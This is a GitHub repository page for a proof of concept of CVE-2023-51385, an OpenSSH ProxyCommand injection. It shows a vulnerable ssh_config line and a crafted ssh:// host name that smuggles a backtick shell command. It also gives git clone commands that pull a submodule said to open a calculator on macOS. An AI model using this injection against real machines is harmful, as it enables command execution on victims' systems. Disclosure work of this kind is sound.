Skip to content

thinkliving2020/CVE-2023-51385-

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
.gitmodules
.gitmodules
 
 
ReadMe.txt
ReadMe.txt
 
 

Repository files navigation

RCE via insecure ~/.ssh/config
Use of tokens like %h, %p in is quite popular to use tunnels and connection proxying using SSH.ProxyCommand

Vulnerable config
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Note: in my initial assessment I was under the impression that using '%h` (single quotes) would avoid this, but looks like that is still going to be vulnerable with something like:

ssh://`echo helloworld` > cve.txt`foo.example.com/bar
Taken from: https://man.openbsd.org/ssh_config#ProxyCommand

What is in this repository
A submodule which would exploit this vulnerability to pop a calculator on OSX.

Try it out using:

git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules

or

git clone git@github.com:vin01/poc-proxycommand-vulnerable.git --recurse-submodules

About

CVE-2023-51385

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published